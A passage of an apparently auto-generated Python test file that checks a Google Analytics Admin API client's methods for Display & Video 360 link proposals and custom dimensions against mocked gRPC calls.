await client.create_display_video360_advertiser_link_proposal( analytics_admin.CreateDisplayVideo360AdvertiserLinkProposalRequest(), parent="parent_value", display_video_360_advertiser_link_proposal=resources.DisplayVideo360AdvertiserLinkProposal( name="name_value" ), ) def test_delete_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert response is None def test_delete_display_video360_advertiser_link_proposal_from_dict(): test_delete_display_video360_advertiser_link_proposal(request_type=dict) def test_delete_display_video360_advertiser_link_proposal_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: client.delete_display_video360_advertiser_link_proposal() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest() ) @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_proposal_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_display_video360_advertiser_link_proposal( request ) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_proposal_async_from_dict(): await test_delete_display_video360_advertiser_link_proposal_async(request_type=dict) def test_delete_display_video360_advertiser_link_proposal_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = None client.delete_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_proposal_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_display_video360_advertiser_link_proposal_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_display_video360_advertiser_link_proposal(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_display_video360_advertiser_link_proposal_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_display_video360_advertiser_link_proposal( analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_proposal_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_display_video360_advertiser_link_proposal( name="name_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_proposal_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_display_video360_advertiser_link_proposal( analytics_admin.DeleteDisplayVideo360AdvertiserLinkProposalRequest(), name="name_value", ) def test_approve_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.approve_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = ( analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse() ) response = client.approve_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance( response, analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse ) def test_approve_display_video360_advertiser_link_proposal_from_dict(): test_approve_display_video360_advertiser_link_proposal(request_type=dict) def test_approve_display_video360_advertiser_link_proposal_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.approve_display_video360_advertiser_link_proposal), "__call__", ) as call: client.approve_display_video360_advertiser_link_proposal() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest() ) @pytest.mark.asyncio async def test_approve_display_video360_advertiser_link_proposal_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.approve_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse() ) response = await client.approve_display_video360_advertiser_link_proposal( request ) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance( response, analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse ) @pytest.mark.asyncio async def test_approve_display_video360_advertiser_link_proposal_async_from_dict(): await test_approve_display_video360_advertiser_link_proposal_async( request_type=dict ) def test_approve_display_video360_advertiser_link_proposal_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.approve_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = ( analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse() ) client.approve_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_approve_display_video360_advertiser_link_proposal_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.approve_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ApproveDisplayVideo360AdvertiserLinkProposalResponse() ) await client.approve_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_cancel_display_video360_advertiser_link_proposal( transport: str = "grpc", request_type=analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.cancel_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) response = client.cancel_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" def test_cancel_display_video360_advertiser_link_proposal_from_dict(): test_cancel_display_video360_advertiser_link_proposal(request_type=dict) def test_cancel_display_video360_advertiser_link_proposal_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.cancel_display_video360_advertiser_link_proposal), "__call__", ) as call: client.cancel_display_video360_advertiser_link_proposal() call.assert_called() _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest() ) @pytest.mark.asyncio async def test_cancel_display_video360_advertiser_link_proposal_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.cancel_display_video360_advertiser_link_proposal), "__call__", ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", validation_email="validation_email_value", ) ) response = await client.cancel_display_video360_advertiser_link_proposal( request ) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert ( args[0] == analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest() ) # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLinkProposal) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" assert response.validation_email == "validation_email_value" @pytest.mark.asyncio async def test_cancel_display_video360_advertiser_link_proposal_async_from_dict(): await test_cancel_display_video360_advertiser_link_proposal_async(request_type=dict) def test_cancel_display_video360_advertiser_link_proposal_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.cancel_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = resources.DisplayVideo360AdvertiserLinkProposal() client.cancel_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_cancel_display_video360_advertiser_link_proposal_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CancelDisplayVideo360AdvertiserLinkProposalRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.cancel_display_video360_advertiser_link_proposal), "__call__", ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLinkProposal() ) await client.cancel_display_video360_advertiser_link_proposal(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_create_custom_dimension( transport: str = "grpc", request_type=analytics_admin.CreateCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) response = client.create_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True def test_create_custom_dimension_from_dict(): test_create_custom_dimension(request_type=dict) def test_create_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: client.create_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomDimensionRequest() @pytest.mark.asyncio async def test_create_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) ) response = await client.create_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True @pytest.mark.asyncio async def test_create_custom_dimension_async_from_dict(): await test_create_custom_dimension_async(request_type=dict) def test_create_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateCustomDimensionRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: call.return_value = resources.CustomDimension() client.create_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateCustomDimensionRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) await client.create_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_custom_dimension( parent="parent_value", custom_dimension=resources.CustomDimension(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].custom_dimension == resources.CustomDimension(name="name_value") def test_create_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_custom_dimension( analytics_admin.CreateCustomDimensionRequest(), parent="parent_value", custom_dimension=resources.CustomDimension(name="name_value"), ) @pytest.mark.asyncio async def test_create_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_custom_dimension( parent="parent_value", custom_dimension=resources.CustomDimension(name="name_value"), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[0].custom_dimension == resources.CustomDimension(name="name_value") @pytest.mark.asyncio async def test_create_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_custom_dimension( analytics_admin.CreateCustomDimensionRequest(), parent="parent_value", custom_dimension=resources.CustomDimension(name="name_value"), ) def test_update_custom_dimension( transport: str = "grpc", request_type=analytics_admin.UpdateCustomDimensionRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) response = client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True def test_update_custom_dimension_from_dict(): test_update_custom_dimension(request_type=dict) def test_update_custom_dimension_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: client.update_custom_dimension() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomDimensionRequest() @pytest.mark.asyncio async def test_update_custom_dimension_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateCustomDimensionRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension( name="name_value", parameter_name="parameter_name_value", display_name="display_name_value", description="description_value", scope=resources.CustomDimension.DimensionScope.EVENT, disallow_ads_personalization=True, ) ) response = await client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateCustomDimensionRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.CustomDimension) assert response.name == "name_value" assert response.parameter_name == "parameter_name_value" assert response.display_name == "display_name_value" assert response.description == "description_value" assert response.scope == resources.CustomDimension.DimensionScope.EVENT assert response.disallow_ads_personalization is True @pytest.mark.asyncio async def test_update_custom_dimension_async_from_dict(): await test_update_custom_dimension_async(request_type=dict) def test_update_custom_dimension_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomDimensionRequest() request.custom_dimension.name = "custom_dimension.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: call.return_value = resources.CustomDimension() client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_dimension.name=custom_dimension.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_custom_dimension_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateCustomDimensionRequest() request.custom_dimension.name = "custom_dimension.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) await client.update_custom_dimension(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "custom_dimension.name=custom_dimension.name/value", ) in kw["metadata"] def test_update_custom_dimension_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_custom_dimension( custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].custom_dimension == resources.CustomDimension(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_custom_dimension_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_custom_dimension( analytics_admin.UpdateCustomDimensionRequest(), custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_custom_dimension_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_custom_dimension), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.CustomDimension() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.CustomDimension() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_custom_dimension( custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].custom_dimension == resources.CustomDimension(name="name_value") assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_custom_dimension_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_custom_dimension( analytics_admin.UpdateCustomDimensionRequest(), custom_dimension=resources.CustomDimension(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_custom_dimensions( transport: str = "grpc", request_type=analytics_admin.ListCustomDimensionsRequest ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_custom_dimensions), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListCustomDimensionsResponse( next_page_token="next_page_token_value", ) response = client.list_custom_dimensions(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListCustomDimensionsRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListCustomDimensionsPager) assert response.next_page_token == "next_page_token_value" def test_list_custom_dimensions_from_dict(): 